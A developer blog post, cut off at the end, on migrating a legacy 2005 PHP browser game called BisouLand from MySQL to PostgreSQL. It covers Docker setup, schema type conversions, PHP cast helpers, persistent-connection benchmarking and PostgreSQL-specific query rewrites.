The combination of insecure cookie handling (storing plain username and password, missing security flags) and unescaped user-generated content created a perfect storm for account takeover attacks.
With these remediation steps in place, BisouLand is significantly more secure against the most common web application attacks.
⁉️ What do you mean, "how can we test if the leaping feature works"?
🤘 The Legacy Executioner casts MySQL into the void of deprecated technologies, summoning PostgreSQL from the northern lands to claim dominion over schemas with its superior type system and extension arsenal! 🔥
In this series, we're dealing with BisouLand, an eXtreme Legacy application (a 2005 LAMP spaghetti code base). So far, we can run it locally (http://localhost:43000/) and have some level of automated tests.
But it's still using the M in LAMP: MySQL.
Let's migrate to PostgreSQL instead, which provides native support for some interesting types (BOOLEAN, UUID and JSONB):
Let's start by changing the pdo_mysql PHP extension to pdo_pgsql in Dockerfile:
# syntax=docker/dockerfile:1
###
# PHP Dev Container
# Utility Tools: Apache, PHP-FPM, bash, Composer
###
FROM php:8.5-fpm-alpine AS php_dev_container
# Composer environment variables:
# * default user is superuser (root), so allow them
# * put cache directory in a readable/writable location
# _Note_: When running `composer` in container, use `--no-cache` option
ENV COMPOSER_ALLOW_SUPERUSER=1 \
COMPOSER_CACHE_DIR=/tmp/.composer/cache
# Install dependencies:
# * apache: for the webserver
# * bash: for shell access and scripting
# * postgresql: for PDO's SQL queries
# * libzip-dev: for composer packages that use ZIP archives
# _Note (Alpine)_: `--no-cache` includes `--update` and keeps image size minimal
#
# Then install PHP extensions
#
# _Note (Hadolint)_: No version locking, since Alpine only ever provides one version
# hadolint ignore=DL3018
RUN apk add --update --no-cache \
apache2 \
apache2-proxy \
apache2-ssl \
bash \
libzip-dev \
postgresql-dev \
&& sed -i 's/^#LoadModule rewrite_module/LoadModule rewrite_module/' /etc/apache2/httpd.conf \
&& docker-php-ext-install \
pdo_pgsql
# Copy Composer binary from composer image
# _Note (Hadolint)_: False positive as `COPY` works with images too
# See: https://github.com/hadolint/hadolint/issues/197#issuecomment-1016595425
# hadolint ignore=DL3022
COPY --from=composer:2 /usr/bin/composer /usr/bin/composer
WORKDIR /apps/monolith
# Caching `composer install`, as long as composer.{json,lock} don't change.
COPY composer.json composer.lock ./
RUN composer install \
--no-cache \
--no-interaction \
--no-plugins \
--no-scripts \
--optimize-autoloader \
&& chmod -R o+rX vendor/
# Copy Apache configuration
COPY apache-site.conf /etc/apache2/conf.d/bisouland.conf
# Copy the remaining application files (excluding those listed in .dockerignore)
COPY . .
# Configure Apache proxy modules for PHP-FPM
RUN sed -i 's|^#LoadModule proxy_module|LoadModule proxy_module|' /etc/apache2/httpd.conf \
&& sed -i 's|^#LoadModule proxy_fcgi_module|LoadModule proxy_fcgi_module|' /etc/apache2/httpd.conf
# Create startup script to run both PHP-FPM and Apache
RUN echo '#!/bin/sh' > /start.sh \
&& echo 'php-fpm -D' >> /start.sh \
&& echo 'exec httpd -D FOREGROUND' >> /start.sh \
&& chmod +x /start.sh
EXPOSE 80
CMD ["/start.sh"]
Next, we change the image from mysql to postgresql in compose.yaml:
name: bisouland-monolith
services:
web:
build: .
ports:
- "43000:80"
volumes:
- .:/apps/monolith
- vendor:/apps/monolith/vendor
depends_on:
- db
environment:
DATABASE_HOST: ${DATABASE_HOST}
DATABASE_PORT: ${DATABASE_PORT}
DATABASE_USER: ${DATABASE_USER}
DATABASE_PASSWORD: ${DATABASE_PASSWORD}
DATABASE_NAME: ${DATABASE_NAME}
restart: unless-stopped
db:
image: postgres:17
platform: linux/amd64
environment:
POSTGRES_PASSWORD: ${DATABASE_PASSWORD}
POSTGRES_DB: ${DATABASE_NAME}
POSTGRES_USER: ${DATABASE_USER}
volumes:
- postgres_data:/var/lib/postgresql/data
ports:
- "127.0.0.1:43001:5432"
restart: unless-stopped
volumes:
postgres_data:
vendor:
The .env file barely changes: the port becomes 5432, and we remove the MYSQL_ROOT_PASSWORD envvar:
# Database
DATABASE_HOST=db
DATABASE_PORT=5432
DATABASE_USER=bisouland
DATABASE_PASSWORD=bisouland_pass
DATABASE_NAME=bisouland
MySQL and PostgreSQL vary in their SQL types and syntax, so a first pass needs to be done to convert the SQL queries, following this table:
| PostgreSQL | MySQL |
|---|---|
| Data Types | |
| SERIAL PRIMARY KEY | INT PRIMARY KEY AUTO_INCREMENT |
| INTEGER | INT |
| SMALLINT | TINYINT(1) |
| SQL Syntax | |
| LIMIT 5 OFFSET 0 | LIMIT 0, 5 |
| ON CONFLICT (id) DO UPDATE | ON DUPLICATE KEY UPDATE |
| extract(epoch from now())::integer | UNIX_TIMESTAMP() |
For example in evo.php:
// On passe à une nouvelle construction si disponible.
- $stmt = $pdo->prepare('SELECT id, duree, type, cout FROM liste WHERE auteur = :auteur AND classe = :classe ORDER BY id LIMIT 0,1');
+ $stmt = $pdo->prepare('SELECT id, duree, type, cout FROM liste WHERE auteur = :auteur AND classe = :classe ORDER BY id LIMIT 1 OFFSET 0');
$stmt->execute(['auteur' => $id, 'classe' => $classeCancel]);
And in schema.sql:
-- Messages table
-- Field order MUST match INSERT statements in fctIndex.php::AdminMP()
CREATE TABLE IF NOT EXISTS messages (
- id INT PRIMARY KEY AUTO_INCREMENT, -- Auto-increment
- posteur INT NOT NULL, -- Matches $source/$expediteur from INSERT
- destin INT NOT NULL, -- Matches $cible from INSERT
+ id SERIAL PRIMARY KEY, -- Auto-increment
+ posteur INTEGER NOT NULL, -- Matches $source/$expediteur from INSERT
+ destin INTEGER NOT NULL, -- Matches $cible from INSERT
message TEXT NOT NULL, -- Matches $message from INSERT
- timestamp INT NOT NULL, -- Matches $timer/time() from INSERT
- statut TINYINT(1) DEFAULT 0, -- Matches '0'/$lu from INSERT
+ timestamp INTEGER NOT NULL, -- Matches $timer/time() from INSERT
+ statut SMALLINT DEFAULT 0, -- Matches '0'/$lu from INSERT
titre VARCHAR(100) NOT NULL -- Matches $titre/$objet from INSERT
);
But PostgreSQL is much more interesting than that.
Some of the MySQL TINYINT columns were actually booleans, and as it turns out,
PostgreSQL does have a BOOLEAN type:
-- Messages table
-- Field order MUST match INSERT statements in fctIndex.php::AdminMP()
CREATE TABLE IF NOT EXISTS messages (
id SERIAL PRIMARY KEY, -- Auto-increment
posteur INTEGER NOT NULL, -- Matches $source/$expediteur from INSERT
destin INTEGER NOT NULL, -- Matches $cible from INSERT
message TEXT NOT NULL, -- Matches $message from INSERT
timestamp INTEGER NOT NULL, -- Matches $timer/time() from INSERT
- statut SMALLINT DEFAULT 0, -- Matches '0'/$lu from INSERT
+ statut BOOLEAN DEFAULT FALSE, -- (FALSE=unread, TRUE=read)
titre VARCHAR(100) NOT NULL -- Matches $titre/$objet from INSERT
);
Which means we get a PHP bool upon selecting these:
- <td><?php if (0 == $donnees['statut']) {
+ <td><?php if (false === $donnees['statut']) {
echo '<a class="bulle" style="cursor: default;" onclick="return false;" href=""><img src="images/newmess.png" alt="Message non lu" title="" /><span>Message >
}?></td>
But there is a catch: when binding parameters, PDO will not convert a PHP bool to a PostgreSQL BOOLEAN!
We have to do the PHP bool to PHP string conversion ourselves:
<?php
namespace Bl\Infrastructure\Pg;
class CastToPgBoolean
{
/**
* PostgreSQL's BOOLEAN fields are strings with the following values:
* - `true`, `t`, `TRUE`
* - `false`, `f`, `FALSE`
*/
public function from(bool $value): string
{
return $value ? 'TRUE' : 'FALSE';
}
}
And do that before calling PDO:
$stmt = $pdo->prepare(
'INSERT INTO membres (pseudo, mdp, confirmation, timestamp, lastconnect, amour)'
.' VALUES (:pseudo, :mdp, :confirmation, :timestamp, :lastconnect, :amour)',
);
- $stmt->execute(['pseudo' => $pseudo, 'mdp' => $hmdp, 'confirmation' => 1, 'timestamp' => time(), 'lastconnect' => time(), 'amour' => 300]);
+ $stmt->execute(['pseudo' => $pseudo, 'mdp' => $hmdp, 'confirmation' => $castToPgBoolean->from(true), 'timestamp' => time(), 'lastconnect' => time(), 'amour' => 300]);
If a value is constant rather than bound as a parameter, we can write TRUE and FALSE directly in the SQL, as follows:
// On supprime les unités.
- $stmt = $pdo->prepare('UPDATE membres SET smack = :smack, baiser = :baiser, pelle = :pelle, bloque = 0 WHERE id = :id');
+ $stmt = $pdo->prepare('UPDATE membres SET smack = :smack, baiser = :baiser, pelle = :pelle, bloque = FALSE WHERE id = :id');
$stmt->execute(['smack' => $AttSmack, 'baiser' => $AttBaiser, 'pelle' => $AttPelle, 'id' => $idAuteur]);
In BisouLand, time and intervals are an essential component of the game: when blowing a kiss, these kisses will take some time to travel to the target, and then as much time to come back.
In 2005 eXtreme Legacy fashion, time was handled as a UNIX timestamp: the number of seconds since January 1st, 1970.
Since PostgreSQL has a TIMESTAMPTZ type, an actual date with timezone information (rendered as an ISO 8601-like string),
we can take the opportunity to modernise the code:
-- Attack log table
-- Logs completed attacks for rate limiting, INSERT in attaque.php:16, checked in action.php:74
CREATE TABLE IF NOT EXISTS logatt (
id SERIAL PRIMARY KEY, -- Log entry ID
auteur INTEGER NOT NULL, -- Attacker user ID, checked for rate limiting
cible INTEGER NOT NULL, -- Target user ID
- timestamp INTEGER NOT NULL -- Attack completion time, used for 12-hour limit check
+ timestamp TIMESTAMPTZ NOT NULL -- Attack completion time, used for 12-hour limit check
);
We take the opportunity to use PostgreSQL's CURRENT_TIMESTAMP function when possible,
and even do INTERVAL calculations:
- $stmt = $pdo->prepare('SELECT COUNT(*) AS nb_att FROM logatt WHERE auteur = :auteur AND cible = :cible AND timestamp >= :timestamp');
- $stmt->execute(['auteur' => $id, 'cible' => $cible, 'timestamp' => time() - 43200]);
+ $stmt = $pdo->prepare("SELECT COUNT(*) AS nb_att FROM logatt WHERE auteur = :auteur AND cible = :cible AND timestamp >= CURRENT_TIMESTAMP - INTERVAL '12 hours'");
+ $stmt->execute(['auteur' => $id, 'cible' => $cible]);
I gotta admit, I'm not ready yet to convert all the UNIX timestamps in the code to DateTime objects,
so we'll have to convert them from PHP int to PHP string in ISO 8601 format:
<?php
namespace Bl\Infrastructure\Pg;
class CastToPgTimestamptz
{
/**
* PostgreSQL's TIMESTAMPTZ fields are strings in (sort of) ISO 8601 date format:
* - '2025-11-20T16:45:03.336548+00:00' (fully ISO 8601 compliant)
* - '2025-11-20 16:45:03+00'
* - '2025-11-20 16:45:03+00:00'
* - '2025-11-20 16:45:03.336548+00'
* - '2025-11-20 16:45:03.336548+00:00'
*/
public function fromUnixTimestamp(int $unixTimestamp): string
{
return new \DateTimeImmutable("@{$unixTimestamp}")->format('Y-m-d\TH:i:s.uP');
}
}
And:
<?php
namespace Bl\Infrastructure\Pg;
class CastToUnixTimestamp
{
/**
* PostgreSQL's TIMESTAMPTZ fields are strings in (sort of) ISO 8601 date format:
* - '2025-11-20T16:45:03.336548+00:00' (fully ISO 8601 compliant)
* - '2025-11-20 16:45:03+00'
* - '2025-11-20 16:45:03+00:00'
* - '2025-11-20 16:45:03.336548+00'
* - '2025-11-20 16:45:03.336548+00:00'
*/
public function fromPgTimestamptz(string $timestamptz): int
{
return new \DateTimeImmutable($timestamptz)->getTimestamp();
}
}
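As a sanity check, the two casts should round-trip: converting a UNIX timestamp to a TIMESTAMPTZ string and back must yield the original value. Here is a standalone sketch, with plain functions mirroring the two classes above:

```php
<?php
declare(strict_types=1);

// Standalone versions of the two cast helpers above, for illustration only.
function toPgTimestamptz(int $unixTimestamp): string
{
    return (new \DateTimeImmutable("@{$unixTimestamp}"))->format('Y-m-d\TH:i:s.uP');
}

function toUnixTimestamp(string $timestamptz): int
{
    return (new \DateTimeImmutable($timestamptz))->getTimestamp();
}

// The epoch itself renders as a fully ISO 8601 compliant string...
assert(toPgTimestamptz(0) === '1970-01-01T00:00:00.000000+00:00');

// ...and any timestamp survives the round trip (second precision).
$now = time();
assert(toUnixTimestamp(toPgTimestamptz($now)) === $now);
```

Note that the conversion is lossless at second precision, which is all a UNIX timestamp stored as an int can carry anyway.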
So when interacting with PDO, we do:
- $stmt = $pdo->prepare('INSERT INTO attaque VALUES (:auteur, :cible, :finaller, :finretour, 0)');
- $stmt->execute(['auteur' => $id, 'cible' => $cible, 'finaller' => time() + $duree, 'finretour' => time() + 2 * $duree]);
+ $stmt = $pdo->prepare('INSERT INTO attaque (auteur, cible, finaller, finretour, etat) VALUES (:auteur, :cible, :finaller, :finretour, 0)');
+ $stmt->execute(['auteur' => $id, 'cible' => $cible, 'finaller' => $castToPgTimestamptz->fromUnixTimestamp(time() + $duree), 'finretour' => $castToPgTimestamptz->fromUnixTimestamp(time() + 2 * $duree)]);
I love UUIDs. Don't ask me why, I just do.
So it made total sense for me to add something I loved in the love game that is BisouLand:
-- Evolution/construction queue
-- Active construction tasks, INSERT in index.php:427, SELECT/DELETE in index.php:392-409
CREATE TABLE IF NOT EXISTS evolution (
- id SERIAL PRIMARY KEY, -- Task ID for deletion when complete
+ id UUID PRIMARY KEY, -- Task ID (UUIDv7) for deletion when complete
timestamp TIMESTAMPTZ NOT NULL, -- Completion time, checked against time() in index.php:392
classe INTEGER NOT NULL, -- Object class/category for construction
type INTEGER NOT NULL, -- Specific object type within class
- auteur INTEGER NOT NULL, -- User ID who initiated construction, from $id2
+ auteur UUID NOT NULL, -- User ID (foreign key to membres.id) who initiated construction
cout BIGINT NOT NULL -- Cost of the construction task
);
I've been using UUID v4 for a while, which are randomly generated, but there's a new kid in town: v7, which is still random but sortable by creation time, as its first 48 bits are a UNIX Epoch timestamp in milliseconds.
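To see why v7 sorts by creation time, here is a minimal, illustrative generator. This is a sketch of the bit layout only, not Symfony's implementation:

```php
<?php
declare(strict_types=1);

// Illustrative UUIDv7: 48-bit big-endian ms timestamp, version/variant bits, random tail.
function uuidV7(?int $milliseconds = null): string
{
    $milliseconds ??= (int) (microtime(true) * 1000);

    $bytes = substr(pack('J', $milliseconds), 2) // keep the low 48 bits, big-endian
        . random_bytes(10);                      // 80 bits of randomness

    $bytes[6] = chr((ord($bytes[6]) & 0x0F) | 0x70); // version nibble = 7
    $bytes[8] = chr((ord($bytes[8]) & 0x3F) | 0x80); // RFC variant bits = 10

    $hex = bin2hex($bytes);

    return sprintf(
        '%s-%s-%s-%s-%s',
        substr($hex, 0, 8),
        substr($hex, 8, 4),
        substr($hex, 12, 4),
        substr($hex, 16, 4),
        substr($hex, 20)
    );
}

// The timestamp leads, so lexicographic order matches creation order:
assert(strcmp(uuidV7(1000), uuidV7(2000)) < 0);
```

Since the random tail only breaks ties, two UUIDs generated a millisecond apart already sort correctly, which is what makes v7 a good fit for primary keys in insert-heavy tables.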
Of course, I want the client to generate the UUID, not the database, and this can be done thanks to the Symfony Uid component:
+ use Symfony\Component\Uid\Uuid;
// On indique que l'attaque a eu lieu.
- $stmt = $pdo->prepare('INSERT INTO logatt VALUES(:auteur, :cible, :timestamp)');
- $stmt->execute(['auteur' => $idAuteur, 'cible' => $idCible, 'timestamp' => $finaller]);
+ $stmt = $pdo->prepare('INSERT INTO logatt (id, auteur, cible, timestamp) VALUES(:id, :auteur, :cible, :timestamp)');
+ $stmt->execute(['id' => Uuid::v7(), 'auteur' => $idAuteur, 'cible' => $idCible, 'timestamp' => $finaller]);
Oh but hang on, how did we get a Symfony 8 feature into a 2005 LAMP app, you ask?
Well, it required some tricks, such as renaming index.php to app.php,
and creating the following front controller in index.php:
<?php
declare(strict_types=1);
require __DIR__.'/../vendor/autoload.php';
try {
require __DIR__.'/../phpincludes/app.php';
} catch (Throwable $throwable) {
http_response_code(500);
error_log($throwable->getMessage());
echo 'An error occurred';
}
With that, we can now use Composer to pull in third-party libraries; see the composer.json:
{
"name": "bl/monolith",
"description": "The original BisouLand codebase",
"type": "project",
"license": "Apache-2.0",
"require": {
"php": ">=8.5",
"ext-curl": "*",
"symfony/uid": "^8.0@rc"
},
"autoload": {
"psr-4": {
"Bl\\": "src/"
},
"files": [
"phpincludes/bd.php",
"phpincludes/cast_to_pg_boolean.php",
"phpincludes/cast_to_unix_timestamp.php",
"phpincludes/cast_to_pg_timestamptz.php",
"phpincludes/fctIndex.php"
]
},
"config": {
"bump-after-update": true,
"sort-packages": true
}
}
Surely, switching from MySQL to PostgreSQL will bring us massive performance boosts, right? Right??
Let's find out with some vanity benchmarks:
# Start fresh
cd apps/monolith
make app-init
BENCH_USER="BisouTest_bench"
BENCH_PASS="SuperSecret123"
# Sign up
curl -X POST 'http://localhost:43000/inscription.html' \
-H 'Content-Type: application/x-www-form-urlencoded' \
-d "Ipseudo=${BENCH_USER}&Imdp=${BENCH_PASS}&Imdp2=${BENCH_PASS}&inscription=S%27inscrire"
# Log in
BENCH_COOKIE=$(curl -X POST 'http://localhost:43000/redirect.php' \
-H 'Content-Type: application/x-www-form-urlencoded' \
-d "pseudo=${BENCH_USER}&mdp=${BENCH_PASS}&connexion=Se+connecter" \
-i -s | grep -i 'set-cookie: PHPSESSID' | sed 's/.*PHPSESSID=\([^;]*\).*/\1/' | tr -d '\r')
# Test load homepage (not signed in)
ab -l -q -k -c 50 -n 10000 http://localhost:43000/ \
| grep -E "Complete requests|Failed requests|Exception|Requests per second|Time per request.*across"
# Test load Brain page (signed in)
ab -l -q -k -c 50 -n 10000 -C "PHPSESSID=$BENCH_COOKIE" http://localhost:43000/cerveau.html \
| grep -E "Complete requests|Failed requests|Exception|Requests per second|Time per request.*across"
We execute this before the migration (I've kindly upgraded to MySQL 8), and after the migration to PostgreSQL.
On my MacBook M4 (with Docker), the results are as follows:
- Homepage (not signed in): 1503 to 100 requests per second, 0.665 to 9.943 ms per request
- Brain page (signed in): 1133 to 96 requests per second, 0.883 to 10.348 ms per request

🚨 Performance degradation: 90% slower than MySQL 🙀
How is that possible?? My core beliefs are now completely shattered!!!!111oneoneeleven
Unless... Unless we've missed one important configuration step:
<?php
function bd_connect()
{
static $pdo = null;
if (null === $pdo) {
$dsn = 'pgsql:host='.DATABASE_HOST.';port='.DATABASE_PORT.';dbname='.DATABASE_NAME;
$options = [
PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
PDO::ATTR_EMULATE_PREPARES => false,
// Don't forget to set persistent connections!
PDO::ATTR_PERSISTENT => true,
];
$pdo = new PDO($dsn, DATABASE_USER, DATABASE_PASSWORD, $options);
}
return $pdo;
}
And indeed, we had forgotten to enable persistent connections.
As it turns out, the overhead of setting up a new connection with PostgreSQL is quite significant.
Let's re-run our tests (making sure MySQL also gets persistent connections):
- Homepage (not signed in): 1683.86 to 1905.43 requests per second, 0.594 to 0.525 ms per request
- Brain page (signed in): 1309.55 to 1828.19 requests per second, 0.764 to 0.547 ms per request

Phew, my mid-life crisis is postponed 😌. PostgreSQL is, after all, faster than MySQL.
It's great to see that the signed-in pages are now as fast as the not-signed-in ones.
With persistent connections, it's harder to drop and recreate the database: we first need to terminate the active connections.
Once the database has been dropped, created and the schema loaded, we also need to restart PostgreSQL to clear the connection pool:
#!/usr/bin/env bash
# File: /apps/monolith/bin/db-reset.sh
# ──────────────────────────────────────────────────────────────────────────────
# Database reset:
# * drops the database
# * then recreates it
# * and finally loads the schema
#
# Intended for development and testing purposes.
# ──────────────────────────────────────────────────────────────────────────────
_BIN_DIR="$(dirname "$(readlink -f "${BASH_SOURCE[0]:-$0}")")"
_ROOT_DIR="$(realpath "${_BIN_DIR}/..")"
cd "${_ROOT_DIR}"
# ──────────────────────────────────────────────────────────────────────────────
# Loading database config through environment variables.
# `set -a` enables exportation of env vars, while `set +a` disables it.
# Passing PostgreSQL password via command line arguments is insecure,
# so using `PGPASSWORD` instead.
# ──────────────────────────────────────────────────────────────────────────────
set -a; source .env; set +a
export PGPASSWORD="${DATABASE_PASSWORD}"
# ──────────────────────────────────────────────────────────────────────────────
# Reset the database, through Docker containers.
# ──────────────────────────────────────────────────────────────────────────────
echo ' // 🔌 Terminating active connections...'
echo ''
docker compose exec -e PGPASSWORD db psql \
-U ${DATABASE_USER} \
-d postgres \
-c "SELECT pg_terminate_backend(pid) FROM pg_stat_activity WHERE datname = '${DATABASE_NAME}' AND pid <> pg_backend_pid();" \
> /dev/null 2>&1
echo ' // 🗑️ Dropping database...'
echo ''
docker compose exec -e PGPASSWORD db psql \
-U ${DATABASE_USER} \
-d postgres \
-c "DROP DATABASE IF EXISTS ${DATABASE_NAME};" \
> /dev/null 2>&1
echo ' // 🆕 Creating database...'
echo ''
docker compose exec -e PGPASSWORD db psql \
-U ${DATABASE_USER} \
-d postgres \
-c "CREATE DATABASE ${DATABASE_NAME};" \
> /dev/null 2>&1
echo ' // 📋 Loading schema.sql...'
echo ''
docker compose exec -T -e PGPASSWORD db psql \
-U ${DATABASE_USER} \
-d ${DATABASE_NAME} \
> /dev/null 2>&1 \
< schema.sql
echo ' // 🔄 Restarting web container to clear connection pool...'
echo ''
docker compose restart web > /dev/null 2>&1
echo ' [OK] Database reset'
There are actually some other types I've taken advantage of,
like INET and ENUM. But there's not much to say about those apart from
"look, I've replaced attaque.etat SMALLINT (0,1,2) with
a blown_kiss_state ENUM ('EnRoute', 'ComingBack', 'CalledOff')":
+ -- Blown kiss state ENUM type
+ CREATE TYPE blown_kiss_state AS ENUM ('EnRoute', 'ComingBack', 'CalledOff');
-- Attack table
-- Active attacks in progress, managed throughout attaque.php and action.php
CREATE TABLE IF NOT EXISTS attaque (
auteur UUID NOT NULL, -- Attacker user ID (foreign key to membres.id), set bloque=1 during attack
cible UUID NOT NULL, -- Target user ID (foreign key to membres.id)
finaller TIMESTAMPTZ NOT NULL, -- Attack arrival timestamp (when units reach target)
finretour TIMESTAMPTZ NOT NULL, -- Return timestamp (when units return home)
- etat SMALLINT NOT NULL DEFAULT 0, -- Attack state: 0=going_to_target, 1=coming_back, 2=cancelled
+ state blown_kiss_state NOT NULL DEFAULT 'EnRoute', -- Blown kiss state ENUM
butin BIGINT DEFAULT 0 -- Loot gained from attack, set after battle
);
I've taken the ENUM opportunity to also introduce a PHP enum:
<?php
declare(strict_types=1);
namespace Bl\Domain\KissBlowing;
/**
* Blown kiss state enum matching PostgreSQL blown_kiss_state type.
*
* Represents the three possible states of a blown kiss mission:
* - EnRoute: Kiss units are traveling to the target
* - ComingBack: Mission completed, units returning with loot
* - CalledOff: Mission was cancelled by the player
*/
enum BlownKissState: string
{
case EnRoute = 'EnRoute';
case ComingBack = 'ComingBack';
case CalledOff = 'CalledOff';
}
Which made some conditions easier to understand:
// // On récupère les infos sur le joueur que l'on attaque.
- $stmt = $pdo->prepare('SELECT cible, finaller, finretour, butin, etat FROM attaque WHERE auteur = :auteur');
+ $stmt = $pdo->prepare('SELECT cible, finaller, finretour, butin, state FROM attaque WHERE auteur = :auteur');
$stmt->execute(['auteur' => $id]);
if ($donnees_info = $stmt->fetch()) {
$stmt2 = $pdo->prepare('SELECT pseudo, nuage, position FROM membres WHERE id = :id');
$stmt2->execute(['id' => $donnees_info['cible']]);
$donnees_info2 = $stmt2->fetch();
$pseudoCible = $donnees_info2['pseudo'];
$nuageCible = $donnees_info2['nuage'];
$positionCible = $donnees_info2['position'];
$finAll = $castToUnixTimestamp->fromPgTimestamptz($donnees_info['finaller']);
$finRet = $castToUnixTimestamp->fromPgTimestamptz($donnees_info['finretour']);
$butinPris = $donnees_info['butin'];
- $etat = $donnees_info['etat'];
+ $state = BlownKissState::from($donnees_info['state']);
- if (isset($_POST['cancelAttaque']) && 0 === $etat) {
+ if (isset($_POST['cancelAttaque']) && BlownKissState::EnRoute === $state) {
$finRet = (2 * time() + $finRet - 2 * $finAll);
$stmt3 = $pdo->prepare("UPDATE attaque SET state = 'CalledOff', finretour = :finretour WHERE auteur = :auteur");
$stmt3->execute(['finretour' => $castToPgTimestamptz->fromUnixTimestamp($finRet), 'auteur' => $id]);
AdminMP($donnees_info['cible'], 'Attaque annulée', "{$pseudo} a annulé son attaque.
Tu n'es plus en danger.");
- $etat = 2; // Update local variable to reflect the change
+ $state = BlownKissState::CalledOff; // Update local variable to reflect the change
}
- if (0 === $etat) {
+ if (BlownKissState::EnRoute === $state) {
?>
Tu vas tenter d'embrasser <strong><?php echo $pseudoCible; ?></strong> sur le nuage <strong><?php echo $nuageCible; ?></strong>
So yeah. There it is.
The eXtreme Legacy (2005 LAMP) app is now migrated from MySQL to PostgreSQL.
It takes advantage of the native PostgreSQL types, such as BOOLEAN, ENUM, INET, TIMESTAMPTZ and UUID, and even gains a 13% performance boost in the process.
I guess it's time to stop calling it a LAMP app (how about a LAPP app?).
⁉️ What do you mean, "there's a big security vulnerability"?
Still not convinced PostgreSQL is the superior database? Let me change your mind.
FYI, this is after doing the vanity benchmarks, so expect further speed gains.
BisouLand has a Statistics page proudly displaying how many players it has:
$retour = $pdo->query('SELECT SUM( amour ) AS nb FROM membres WHERE confirmation = TRUE');
$pointsAmourTotal = $retour->fetchColumn();
$retour = $pdo->query("SELECT COUNT(*) AS nb FROM membres WHERE confirmation=TRUE AND lastconnect >= CURRENT_TIMESTAMP - INTERVAL '5 minutes'");
$connectCinq = $retour->fetchColumn();
$retour = $pdo->query("SELECT COUNT(*) AS nb FROM membres WHERE confirmation=TRUE AND lastconnect >= CURRENT_TIMESTAMP - INTERVAL '1 hour'");
$connectHeure = $retour->fetchColumn();
$retour = $pdo->query("SELECT COUNT(*) AS nb FROM membres WHERE confirmation=TRUE AND lastconnect >= CURRENT_TIMESTAMP - INTERVAL '12 hours'");
$connectMid = $retour->fetchColumn();
$retour = $pdo->query("SELECT COUNT(*) AS nb FROM membres WHERE confirmation=TRUE AND lastconnect >= CURRENT_TIMESTAMP - INTERVAL '24 hours'");
$connectJour = $retour->fetchColumn();
$retour = $pdo->query("SELECT COUNT(*) AS nb FROM membres WHERE confirmation=TRUE AND lastconnect >= CURRENT_TIMESTAMP - INTERVAL '48 hours'");
$connect2Jour = $retour->fetchColumn();
$retour = $pdo->query("SELECT COUNT(*) AS nb FROM membres WHERE confirmation=TRUE AND lastconnect >= CURRENT_TIMESTAMP - INTERVAL '7 days'");
$connectSemaine = $retour->fetchColumn();
$retour = $pdo->query("SELECT COUNT(*) AS nb FROM membres WHERE confirmation=TRUE AND lastconnect >= CURRENT_TIMESTAMP - INTERVAL '30 days'");
$connectMois = $retour->fetchColumn();
$retour = $pdo->query("SELECT COUNT(*) AS nb FROM membres WHERE confirmation=TRUE AND lastconnect >= CURRENT_TIMESTAMP - INTERVAL '1 year'");
$connectAn = $retour->fetchColumn();
We see 9 separate queries. Turns out PostgreSQL can merge them into a single query,
with FILTER:
$stmt = $pdo->query(<<<'SQL'
SELECT
SUM(amour) AS total_love_points,
COUNT(*) FILTER (WHERE lastconnect >= CURRENT_TIMESTAMP - INTERVAL '5 minutes') AS last_5_min,
COUNT(*) FILTER (WHERE lastconnect >= CURRENT_TIMESTAMP - INTERVAL '1 hour') AS last_hour,
COUNT(*) FILTER (WHERE lastconnect >= CURRENT_TIMESTAMP - INTERVAL '12 hours') AS last_12h,
COUNT(*) FILTER (WHERE lastconnect >= CURRENT_TIMESTAMP - INTERVAL '24 hours') AS last_24h,
COUNT(*) FILTER (WHERE lastconnect >= CURRENT_TIMESTAMP - INTERVAL '48 hours') AS last_48h,
COUNT(*) FILTER (WHERE lastconnect >= CURRENT_TIMESTAMP - INTERVAL '7 days') AS last_week,
COUNT(*) FILTER (WHERE lastconnect >= CURRENT_TIMESTAMP - INTERVAL '30 days') AS last_month,
COUNT(*) FILTER (WHERE lastconnect >= CURRENT_TIMESTAMP - INTERVAL '1 year') AS last_year
FROM membres
WHERE confirmation = TRUE
SQL);
/**
* @var array{
* total_love_points: int|null,
* last_5_min: int,
* last_hour: int,
* last_12h: int,
* last_24h: int,
* last_48h: int,
* last_week: int,
* last_month: int,
* last_year: int,
* } $result
*/
$result = $stmt->fetch();
In the following code snippet, we read the current value with a SELECT, increment it in PHP, then write it back with an UPDATE:
// On effectue la tache dans la table membre.
$stmt2 = $pdo->prepare('SELECT '.$Obj[$classe][$type].', amour FROM membres WHERE id = :id');
$stmt2->execute(['id' => $id2]);
$donnees_info = $stmt2->fetch();
$amourConstructeur = $donnees_info['amour'];
// On récupère l'ancienne valeur.
$nbObjEvol = $donnees_info[$Obj[$classe][$type]];
// On augmente d'un.
++$nbObjEvol;
// On met a jour la table.
$stmt2 = $pdo->prepare('UPDATE membres SET '.$Obj[$classe][$type].' = :nb WHERE id = :id');
$stmt2->execute(['nb' => $nbObjEvol, 'id' => $id2]);
With RETURNING, it's possible to increment the value directly in the database and get the new value back in the same query:
// On effectue la tache dans la table membre.
$stmt2 = $pdo->prepare(<<<SQL
UPDATE membres
SET {$upgradableItem} = {$upgradableItem} + 1
WHERE id = :account_id
RETURNING amour, {$upgradableItem}
SQL);
$stmt2->execute([
'account_id' => $upgrade['account_id'],
]);
/** @var array<string, int>|false $player */
$player = $stmt2->fetch();
$amourConstructeur = $player['amour'];
// On récupère l'ancienne valeur.
$nbObjEvol = $player[$upgradableItem];
Sometimes we want to either create a new resource, or modify it, which means an extra query to check the existence:
$stmt = $pdo->prepare('SELECT COUNT(*) AS nbre_entrees FROM connectbisous WHERE ip = :ip');
$stmt->execute(['ip' => $_SERVER['REMOTE_ADDR']]);
$donnees = $stmt->fetch();
if (0 == $donnees['nbre_entrees']) { // L'ip ne se trouve pas dans la table, on va l'ajouter
$stmt = $pdo->prepare('INSERT INTO connectbisous VALUES(:ip, :timestamp, 2)');
$stmt->execute(['ip' => $_SERVER['REMOTE_ADDR'], 'timestamp' => time()]);
} else { // L'ip se trouve déjà dans la table, on met juste à jour le timestamp
$stmt = $pdo->prepare('UPDATE connectbisous SET timestamp = :timestamp WHERE ip = :ip');
$stmt->execute(['timestamp' => time(), 'ip' => $_SERVER['REMOTE_ADDR']]);
}
With "UPSERT" (UPdate + inSERT, also possible in MySQL with a different syntax), it's possible to do all of this in a single query:
$stmt = $pdo->prepare(<<<'SQL'
INSERT INTO connectbisous (ip, timestamp, type)
VALUES (:ip, CURRENT_TIMESTAMP, 2)
